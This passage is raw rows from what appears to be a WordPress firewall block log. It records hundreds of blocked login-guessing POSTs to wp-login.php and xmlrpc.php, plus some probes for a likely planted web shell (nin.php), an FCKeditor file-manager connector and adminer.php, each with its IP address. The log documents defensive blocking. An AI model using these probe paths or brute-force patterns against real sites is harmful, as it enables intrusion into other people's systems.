(KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','raCzycbx3LAiQ7BdoqGYFeXZ',0,1663926196.4760,2095,'','POST',403,0,600,0,1,'',0),('184.75.214.163',3091977891,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','30knPSs4XdoGKMIxw2VtE5eU',0,1663926224.4648,565,'','POST',403,0,515,0,1,'',0),('139.59.118.238',2335930094,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','fPy7UL1n2ZhX5l9oOt3rsTMi',0,1663926238.2629,1423,'','POST',403,0,600,0,1,'',0),('167.71.216.37',2806503461,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OZxGNyLco8EQhIp2JbA0sqBD',0,1663926382.2430,467,'','POST',403,0,600,0,1,'',0),('213.152.161.165',3583549861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','CTvjtdHFD7igoXEnRJbWh5GA',0,1663926678.1061,1825,'','POST',403,0,515,0,1,'',0),('185.233.116.44',3119084588,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','uYeniPF1gfoCsMVARyNUZQDL',0,1663926933.0849,524,'','POST',403,0,600,0,1,'',0),('185.233.116.44',3119084588,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','RvH6QD2kJb73iYCNPqpShwt0',0,1663926935.0136,708,'','POST',403,0,600,0,1,'',0),('177.222.54.214',2984130262,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NTy1Lg2KQSitZp8BXaH3RIqU',0,1663926935.8566,494,'','POST',403,0,600,0,1,'',0),('209.126.7.173',3514697645,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','SFteL7JWpf6i0b9OsRIk3B52',0,1663927559.5025,512,'','POST',403,0,600,0,1,'',0),('209.126.7.173',3514697645,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','BK5wOqtmifg4INsJVQ8S6hrX',0,1663927560.7829,539,'','POST',403,0,600,0,1,'',0),('35.224.216.78',601937998,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','J2sWkZi574MGzIBdct1aeVCw',0,1663927580.8523,578,'','POST',403,0,600,0,1,'',0),('103.130.219.13',1736629005,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','mGiS8Ox439NPfpQKkEYwUncM',0,1663927620.2409,1512,'','POST',403,0,600,0,1,'',0),('139.59.96.126',2335924350,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','Tb9KSgDo8hW3tu5eXcjVQGfn',0,1663927662.1626,538,'','POST',403,0,600,0,1,'',0),('79.137.65.179',1334395315,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AaoX8LlcRmtqeG4WjiChvO3V',0,1663928206.6039,1541,'','POST',403,0,600,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0R3xqgTaFDdYLzHpJjuU9KMe',0,1663928785.9864,519,'','POST',403,0,600,0,1,'',0),('139.59.96.126',2335924350,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','SE2i6lfFpe4hJq3T9WrucoOK',0,1663929055.7484,17856,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','fMkFCotGdBPsjp1ODmEbQSY3',0,1663929095.0981,660,'','POST',403,0,600,0,1,'',0),('93.113.111.193',1567715265,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3APNqsb78IYRkyvxtlwB46fU',0,1663929373.9978,521,'','POST',403,0,600,0,1,'',0),('140.246.255.164',2364997540,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RXq29xV1YJi0PfjOkHI3KFzu',0,1663930051.1389,565,'','POST',403,0,600,0,1,'',0),('64.90.36.102',1079649382,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','97NaDkKYf640g8bQpesv3Rt2',0,1663930474.2216,17793,'','POST',403,0,600,0,1,'',0),('80.88.88.149',1347967125,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','3oiP6jFkrHOfcItMJlEnw9vq',0,1663930516.5803,7848,'','POST',403,0,600,0,1,'',0),('45.252.251.8',771554056,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','oqirFMHRgV5c4jPtE1ALwIz6',0,1663930567.1283,478,'','POST',403,0,600,0,1,'',0),('45.252.251.8',771554056,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','gASb7f5roPsJEcUBTivR1VI0',0,1663930568.8930,541,'','POST',403,0,600,0,1,'',0),('109.233.192.83',1844035667,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pBz2yfbrsE43UZqOeY51V9SA',0,1663930594.5285,637,'','POST',403,0,600,0,1,'',0),('1.117.250.215',24509143,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/54.0.2840.99 Safari\\/537.36\"}','nZy5ACO1XMd4JxUioL7rkPKm',0,1663933370.1244,1334,'','POST',403,0,600,0,1,'',0),('151.80.24.73',2538608713,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','kbRK7ivwMQhfqpjJsPgTlZG8',0,1663933493.4887,588,'','POST',403,0,600,0,1,'',0),('51.79.242.130',860877442,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','OPFs3wdzLThjlmRyoZnSpHf9',0,1663934275.1006,19663,'','POST',403,0,515,0,1,'',0),('57.128.45.42',964701482,'','http://cteisys.com/wp-admin/css/colors/blue/nin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','fXyRaPSKB0Y57mbAz8CgHQJM',0,1663934749.8783,12571,'','GET',403,0,700,0,1,'',0),('139.59.96.126',2335924350,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','E1F7AGsSmgeOpxXVcCkHZnTr',0,1663934766.5467,6292,'','POST',403,0,600,0,1,'',0),('57.128.45.42',964701482,'','https://cteisys.com/wp-admin/css/colors/blue/nin.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','3c4KfzAwFNxtL0bslDeGkvg9',0,1663934772.8111,356,'','GET',403,0,700,0,1,'',0),('85.146.18.88',1435636312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','mxrSH48kT2V91gLPR7stJfvU',0,1663934807.0280,1469,'','POST',403,0,600,0,1,'',0),('51.255.64.58',872366138,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FbJKuOkc2UaDMRveHysWB48p',0,1663934898.5174,8724,'','POST',403,0,515,0,1,'',0),('103.152.164.156',1738056860,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WcJatsn3Rpm7gq6e5TUvoZhX',0,1663935201.7923,18963,'','POST',403,0,515,0,1,'',0),('143.110.137.82',2406386002,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AniCTNhQgO7dDsvLSV0XIqYU',0,1663935521.1073,18899,'','POST',403,0,515,0,1,'',0),('207.148.67.173',3482600365,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PcVYnFbioezrAC3ZDqv4Tayu',0,1663936179.8583,20656,'','POST',403,0,515,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','R3GzEI6nufmVLFgS7MvqJwbj',0,1663936204.7961,1765,'','POST',403,0,600,0,1,'',0),('109.168.97.89',1839751513,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','gmoeh69JQEILlFuPkXDvsHfy',0,1663936247.2016,6579,'','POST',403,0,600,0,1,'',0),('171.244.16.103',2884898919,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RFSjkpKl0B1Vm8HrGLqgDxiU',0,1663936524.2987,1342,'','POST',403,0,515,0,1,'',0),('139.59.85.224',2335921632,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','jNr2W6GJEpkovQdc0Ie915bz',0,1663937634.5793,1579,'','POST',403,0,600,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','UufV4TLvp8F1gJMZaIeo2lkc',0,1663937676.3201,515,'','POST',403,0,600,0,1,'',0),('135.181.60.103',2276801639,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','hcNCmApot6qzavgeMxl5DfjK',0,1663938189.6572,623,'','POST',403,0,600,0,1,'',0),('135.181.60.103',2276801639,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','2qcEvTIl0Z1gzW5p9sPCBMDY',0,1663938191.1712,502,'','POST',403,0,600,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','lset2gD9LMRZH8j1TmdfC45Y',0,1663939087.8038,3826,'','POST',403,0,600,0,1,'',0),('151.106.41.64',2540316992,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','R1UxniKIcXVy0WoQpHaeA8qD',0,1663939127.8165,1198,'','POST',403,0,600,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Tfa12pBmqUedo4vRrSEWGy78',0,1663939683.8817,3778,'','POST',403,0,515,0,1,'',0),('207.55.255.20',3476553492,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','de60APm7DNslEZ3OTXGcIqrM',0,1663940026.5599,1241,'','POST',403,0,515,0,1,'',0),('51.38.237.45',858189101,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','AxwyFYj0D9ipaNWsHfIKlBCP',0,1663940357.4521,1376,'','POST',403,0,515,0,1,'',0),('34.65.234.0',574745088,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','PtiBuUEqyN1RDrp4ons9A7KG',0,1663940529.3941,1929,'','POST',403,0,600,0,1,'',0),('162.240.28.177',2733644977,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','DIYwuFJ2BEfsGk7L5Ugp1acO',0,1663940570.6398,1554,'','POST',403,0,600,0,1,'',0),('194.59.165.88',3258688856,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Fw8fkebsuznoSqpdaW76VYDl',0,1663940689.0773,19184,'','POST',403,0,515,0,1,'',0),('178.128.209.28',2994786588,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','a4Vi5nh9xlBcmY6Rb8vJIgj2',0,1663941040.7448,1293,'','POST',403,0,515,0,1,'',0),('85.191.40.94',1438591070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','9OyA1QpS7BVUYrs4fGmbtEjz',0,1663942011.8206,1319,'','POST',403,0,600,0,1,'',0),('51.79.242.130',860877442,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','7XQevPFBcjCln1ZrfIy9YEsL',0,1663942159.5770,1558,'','POST',403,0,515,0,1,'',0),('188.212.34.36',3168018980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Fo0YuTCbnzGa68X357qAgd24',0,1663942558.7453,2304,'','POST',403,0,515,0,1,'',0),('37.218.255.45',635109165,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','HPfl3jQkdiMTveWpqLFhGB0s',0,1663942950.8048,477,'','POST',403,0,600,0,1,'',0),('37.218.255.45',635109165,'','https://cteisys.com/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https3a2f2fcteisys.com2fwp-admin2f&reauth=1?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','gD2S5ToNPuQzCY8MUmcEpk7w',0,1663942952.2132,514,'','POST',403,0,600,0,1,'',0),('139.59.73.237',2335918573,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','TcnlgrH0Lf3yvBpW1sq5GAEU',0,1663943349.5181,1533,'','POST',403,0,515,0,1,'',0),('139.59.118.238',2335930094,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.122 Safari\\/537.36\"}','uUPjQ45tzyB287fGZwopOrHh',0,1663943426.6374,1235,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','lJfkwVWjPH781ngMECyBLtYu',0,1663943468.9246,1223,'','POST',403,0,600,0,1,'',0),('51.144.238.41',865136169,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','Cv5USxeOzGTr7QgMdWE80Fo6',0,1663943712.2618,534,'','POST',403,0,600,0,1,'',0),('51.144.238.41',865136169,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','0B7JXpxvIUbOVnRDq5a9KmMZ',0,1663943713.5905,443,'','POST',403,0,600,0,1,'',0),('185.182.89.35',3115735331,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iKbaSl6e2vuhsVynBqQJEZHt',0,1663943741.8280,536,'','POST',403,0,515,0,1,'',0),('81.88.52.134',1364735110,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','r1biAGDayNZ7VP4mLj2H6lkU',0,1663944135.7184,1247,'','POST',403,0,515,0,1,'',0),('198.199.81.163',3334951331,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','E7bMAgT0uceWXi96JyohGKLB',0,1663944525.0893,19338,'','POST',403,0,515,0,1,'',0),('103.7.8.169',1728514217,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','8721zfuadC305XQRjopiLMwg',0,1663944641.6048,473,'','POST',403,0,600,0,1,'',0),('103.7.8.169',1728514217,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','H0oR132VNcCbyKElGn9uAOis',0,1663944643.0859,516,'','POST',403,0,600,0,1,'',0),('46.32.228.70',773907526,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','XbLU94GhsAylNDCEnM5ROzwr',0,1663944881.1923,1218,'','POST',403,0,600,0,1,'',0),('54.37.156.240',908434672,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','tKQNZRsXyIwJDWfYugh5Mj0c',0,1663944925.1014,1205,'','POST',403,0,600,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/36.0.1985.125 Chrome\\/36.0.1985.125 Safari\\/537.36\"}','L0wDbKNPFAnth3xY25ZMdpk4',0,1663946264.2992,504,'','POST',403,0,600,0,1,'',0),('75.119.157.181',1266130357,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','VYOarzbQiK1xT8G3XneLZuwS',0,1663946343.2218,1344,'','POST',403,0,600,0,1,'',0),('23.97.205.210',392285650,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','TyCJE6olWKnpmRM4Bdix3vO7',0,1663946385.4882,473,'','POST',403,0,600,0,1,'',0),('192.227.178.147',3236147859,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','eBQ5rF3zVfwYvuGtUkRDy7Om',0,1663946638.0604,1242,'','POST',403,0,515,0,1,'',0),('51.15.183.168',856668072,'','http://cteisys.com/editor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','AmSnQBOce86v5qN0w1V2CpGr',0,1663947351.5622,2439,'','GET',403,0,700,0,1,'',0),('168.119.80.254',2826391806,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','BQ3fk6q9lRLbZrKio1dNzAv5',0,1663947808.9665,2990,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','GcEa2xnYDCXeZUpOH8ANFhm5',0,1663947852.6956,1568,'','POST',403,0,600,0,1,'',0),('162.240.211.236',2733691884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6p5eh7ixT40mjnwWO1KPNvQB',0,1663947925.2475,2371,'','POST',403,0,515,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident\\/5.0)\"}','20DlUgthLdQriuox3sqpNfjw',0,1663948105.7545,1445,'','POST',403,0,600,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hB6uOFMTojKle3DC0NLkyIAG',0,1663948369.7852,1322,'','POST',403,0,515,0,1,'',0),('213.142.151.223',3582891999,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','p7iRQq4bwgrtjckyTUl3osaf',0,1663948453.0416,535,'','POST',403,0,600,0,1,'',0),('213.142.151.223',3582891999,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko\\/20100101 Firefox\\/104.0\",\"2\":\"https:\\/\\/cteisys.com\\/wp-login.php?redirect_to=https%3A%2F%2Fcteisys.com%2Fwp-admin%2F\"}','bktNsiVQPyEu0Y6FOH4rUTBR',0,1663948454.5812,596,'','POST',403,0,600,0,1,'',0),('178.62.110.145',2990435985,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5VsX6OCpvoWYa3ztZwU7rF0e',0,1663948808.3225,20065,'','POST',403,0,515,0,1,'',0),('109.69.3.180',1833239476,'','http://www.cteisys.com/adminer.php','','{\"1\":\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT 5.1; 